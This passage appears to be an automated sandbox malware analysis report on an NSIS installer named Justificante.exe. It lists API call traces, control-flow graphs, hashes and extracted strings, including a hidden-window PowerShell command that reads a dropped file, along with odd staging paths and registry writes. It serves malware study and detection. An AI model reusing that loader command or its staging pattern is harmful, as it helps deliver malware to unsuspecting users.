                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante.exe,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 004030E1
                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                          • API String ID: 2803837635-2304521926
                          • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                          • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
                          • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                          • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D

                          Control-flow Graph
                          • First basic block: 406579-406584
                          APIs
                          • GetSystemDirectoryW.KERNEL32(trikinse,00000400), ref: 004066BA
                          • GetWindowsDirectoryW.KERNEL32(trikinse,00000400,00000000,lgmnd,?,004055DB,lgmnd,00000000), ref: 004066CD
                          • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,lgmnd,?,004055DB,lgmnd,00000000), ref: 00406709
                          • SHGetPathFromIDListW.SHELL32(00000000,trikinse), ref: 00406717
                          • CoTaskMemFree.OLE32(00000000), ref: 00406722
                          • lstrcatW.KERNEL32(trikinse,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
                          • lstrlenW.KERNEL32(trikinse,00000000,lgmnd,?,004055DB,lgmnd,00000000), ref: 004067A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                          • String ID: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$lgmnd$trikinse
                          • API String ID: 717251189-188375809
                          • Opcode ID: 1601c4d7d9683424531442411e17d8d829d5785fc277012caaf8ee8b864246b8
                          • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
                          • Opcode Fuzzy Hash: 1601c4d7d9683424531442411e17d8d829d5785fc277012caaf8ee8b864246b8
                          • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D

                          Control-flow Graph
                          • First basic block: 40176f-401794
                          APIs
                          • lstrcatW.KERNEL32(00000000,00000000,Formeredes,C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer,?,?,00000031), ref: 004017B0
                          • CompareFileTime.KERNEL32(-00000014,?,Formeredes,Formeredes,00000000,00000000,Formeredes,C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer,?,?,00000031), ref: 004017D5
                            • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\ProgramData\bestializing\slagtehuset.spo$C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer$C:\Windows\baksendes$Formeredes
                          • API String ID: 1941528284-3008734590
                          • Opcode ID: 03aac883e9dccf037591db3b07fc1ea700b4f7353d4f51fba005101ecdd61089
                          • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
                          • Opcode Fuzzy Hash: 03aac883e9dccf037591db3b07fc1ea700b4f7353d4f51fba005101ecdd61089
                          • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 759 4055a4-4055b9 760 405670-405674 759->760 761 4055bf-4055d0 759->761 762 4055d2-4055d6 call 406579 761->762 763 4055db-4055e7 lstrlenW 761->763 762->763 765 405604-405608 763->765 766 4055e9-4055f9 lstrlenW 763->766 768 405617-40561b 765->768 769 40560a-405611 SetWindowTextW 765->769 766->760 767 4055fb-4055ff lstrcatW 766->767 767->765 770 405661-405663 768->770 771 40561d-40565f SendMessageW * 3 768->771 769->768 770->760 772 405665-405668 770->772 771->770 772->760
                          APIs
                          • lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                          • lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                          • lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                          • SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID: lgmnd
                          • API String ID: 2531174081-3451853296
                          • Opcode ID: 821461bf1a3e0c9a0b9dfd66dfa0b62158b528cadb26a9773dc4f9578ba51fec
                          • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
                          • Opcode Fuzzy Hash: 821461bf1a3e0c9a0b9dfd66dfa0b62158b528cadb26a9773dc4f9578ba51fec
                          • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 773 405a73-405abe CreateDirectoryW 774 405ac0-405ac2 773->774 775 405ac4-405ad1 GetLastError 773->775 776 405aeb-405aed 774->776 775->776 777 405ad3-405ae7 SetFileSecurityW 775->777 777->774 778 405ae9 GetLastError 777->778 778->776
                          APIs
                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                          • GetLastError.KERNEL32 ref: 00405ACA
                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
                          • GetLastError.KERNEL32 ref: 00405AE9
                          Strings
                          • C:\Users\user\Desktop, xrefs: 00405A73
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                          • API String ID: 3449924974-1729097607
                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                          • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                          • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 779 4068c1-4068e1 GetSystemDirectoryW 780 4068e3 779->780 781 4068e5-4068e7 779->781 780->781 782 4068f8-4068fa 781->782 783 4068e9-4068f2 781->783 785 4068fb-40692e wsprintfW LoadLibraryExW 782->785 783->782 784 4068f4-4068f6 783->784 784->785
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                          • wsprintfW.USER32 ref: 00406913
                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406927
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%S.dll$UXTHEME$\
                          • API String ID: 2200240437-1946221925
                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                          • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                          • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 786 406061-40606d 787 40606e-4060a2 GetTickCount GetTempFileNameW 786->787 788 4060b1-4060b3 787->788 789 4060a4-4060a6 787->789 791 4060ab-4060ae 788->791 789->787 790 4060a8 789->790 790->791
                          APIs
                          • GetTickCount.KERNEL32 ref: 0040607F
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Justificante.exe",004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
                          Strings
                          • "C:\Users\user\Desktop\Justificante.exe", xrefs: 00406061
                          • nsa, xrefs: 0040606E
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-311323776
                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                          • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                          • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 792 402e41-402e6a call 4063a9 794 402e6f-402e73 792->794 795 402f24-402f28 794->795 796 402e79-402e7d 794->796 797 402ea2-402eb5 796->797 798 402e7f-402ea0 RegEnumValueW 796->798 800 402ede-402ee5 RegEnumKeyW 797->800 798->797 799 402f09-402f17 RegCloseKey 798->799 799->795 801 402eb7-402eb9 800->801 802 402ee7-402ef9 RegCloseKey call 406931 800->802 801->799 803 402ebb-402ecf call 402e41 801->803 808 402f19-402f1f 802->808 809 402efb-402f07 RegDeleteKeyW 802->809 803->802 810 402ed1-402edd 803->810 808->795 809->795 810->800
                          APIs
                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CloseEnum$DeleteValue
                          • String ID:
                          • API String ID: 1354259210-0
                          • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                          • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
                          • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                          • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 811 402482-4024a9 call 402d3e * 2 call 402dce 817 4024ae-4024b3 811->817 818 402bc2-402bd1 817->818 819 4024b9-4024c3 817->819 820 4024c5-4024d2 call 402d3e lstrlenW 819->820 821 4024d6-4024d9 819->821 820->821 825 4024db-4024ec call 402d1c 821->825 826 4024ed-4024f0 821->826 825->826 827 402501-402515 RegSetValueExW 826->827 828 4024f2-4024fc call 403309 826->828 832 402517 827->832 833 40251a-4025fb RegCloseKey 827->833 828->827 832->833 833->818 836 402925-40292c 833->836 836->818
                          APIs
                          • lstrlenW.KERNEL32(C:\ProgramData\bestializing\slagtehuset.spo,00000023,00000011,00000002), ref: 004024CD
                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 0040250D
                          • RegCloseKey.ADVAPI32(?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 004025F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CloseValuelstrlen
                          • String ID: C:\ProgramData\bestializing\slagtehuset.spo
                          • API String ID: 2655323295-4256360445
                          • Opcode ID: 17c4465261820c4d01ba54f3f57b37a6feb17deab0db7c5e578ecccbb80d9823
                          • Instruction ID: c269879d92cf6aad1d98ff003e7813fc443ead00aa0a9254d290d0c4c068a2a6
                          • Opcode Fuzzy Hash: 17c4465261820c4d01ba54f3f57b37a6feb17deab0db7c5e578ecccbb80d9823
                          • Instruction Fuzzy Hash: 0311AF71E00108BEDB10AFA5DE49AAEBBB8EF44314F21443AF514F71D1D7B84D419628
                          APIs
                            • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0,00000000), ref: 00405ECA
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                            • Part of subcall function 00405A73: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer,?,00000000,000000F0), ref: 0040164D
                          Strings
                          • C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer, xrefs: 00401640
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                          • String ID: C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer
                          • API String ID: 1892508949-3767348336
                          • Opcode ID: 3cb5caa9db70481eff33ad3d530cfd1d90fdddaf7eee6b67ec42b11d2e186b9f
                          • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
                          • Opcode Fuzzy Hash: 3cb5caa9db70481eff33ad3d530cfd1d90fdddaf7eee6b67ec42b11d2e186b9f
                          • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
                          APIs
                            • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                            • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0,00000000), ref: 00405ECA
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                            • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                          • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0,00000000), ref: 00405F72
                          • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0), ref: 00405F82
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: P_B
                          • API String ID: 3248276644-906794629
                          • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                          • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
                          • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                          • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00405547
                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                            • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                          • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
                          • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                          • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
                          APIs
                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,trikinse,?,?,00406699,80000002), ref: 00406450
                          • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,trikinse,trikinse,trikinse,00000000,lgmnd), ref: 0040645B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID: trikinse
                          • API String ID: 3356406503-3397089422
                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                          • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                          • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
                          APIs
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                          • CloseHandle.KERNEL32(?), ref: 00405B5B
                          Strings
                          • Error launching installer, xrefs: 00405B38
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          APIs
                          • GetTickCount.KERNEL32 ref: 00403425
                            • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
                          • SetFilePointer.KERNELBASE(002764B6,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
                          Similarity
                          • API ID: FilePointer$CountTick
                          • String ID:
                          • API String ID: 1092082344-0
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 004020FB
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                          • String ID:
                          • API String ID: 334405425-0
                          APIs
                            • Part of subcall function 0040689A: FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0), ref: 004068A5
                            • Part of subcall function 0040689A: FindClose.KERNEL32(00000000), ref: 004068B1
                          • lstrlenW.KERNEL32 ref: 00402337
                          • lstrlenW.KERNEL32(00000000), ref: 00402342
                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040236B
                          Similarity
                          • API ID: FileFindlstrlen$CloseFirstOperation
                          • String ID:
                          • API String ID: 1486964399-0
                          APIs
                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
                          • RegCloseKey.ADVAPI32(?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 004025F5
                          Similarity
                          • API ID: Enum$CloseValue
                          • String ID:
                          • API String ID: 397863658-0
                          APIs
                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          APIs
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                          • RegCloseKey.ADVAPI32(?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 004025F5
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                          • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
                          • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                          • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
                          APIs
                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
                          • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseDeleteValue
                          • String ID:
                          • API String ID: 2831762973-0
                          • Opcode ID: 33b3fc7685c92c60e94f70401c71e197941d70c69b0495cf95586cf4f9f05fba
                          • Instruction ID: 0eea939cfefa250e45086769c78755c0b3bfdf1c9c70056638625836d9ad0d91
                          • Opcode Fuzzy Hash: 33b3fc7685c92c60e94f70401c71e197941d70c69b0495cf95586cf4f9f05fba
                          • Instruction Fuzzy Hash: FFF06232A00120ABDB10AFA89A4DAAE73A5AF44314F12443FE651B71C1DAFC5D01563E
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: b9b3991d1ebe911dd375e094db26284e04d3827c435e86b9088208923ace82c2
                          • Instruction ID: 68d2f30391901d1d9ba62db1430854f87f0e26d751f15bb82e1089b222079e22
                          • Opcode Fuzzy Hash: b9b3991d1ebe911dd375e094db26284e04d3827c435e86b9088208923ace82c2
                          • Instruction Fuzzy Hash: 2AE0BF76B20114ABCB14DFA8ED9086E77B5EB54310760487AE902B3290C675AC11CB78
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                            • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                            • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                            • Part of subcall function 004068C1: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406927
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID:
                          • API String ID: 2547128583-0
                          • Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                          • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
                          • Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                          • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
                          APIs
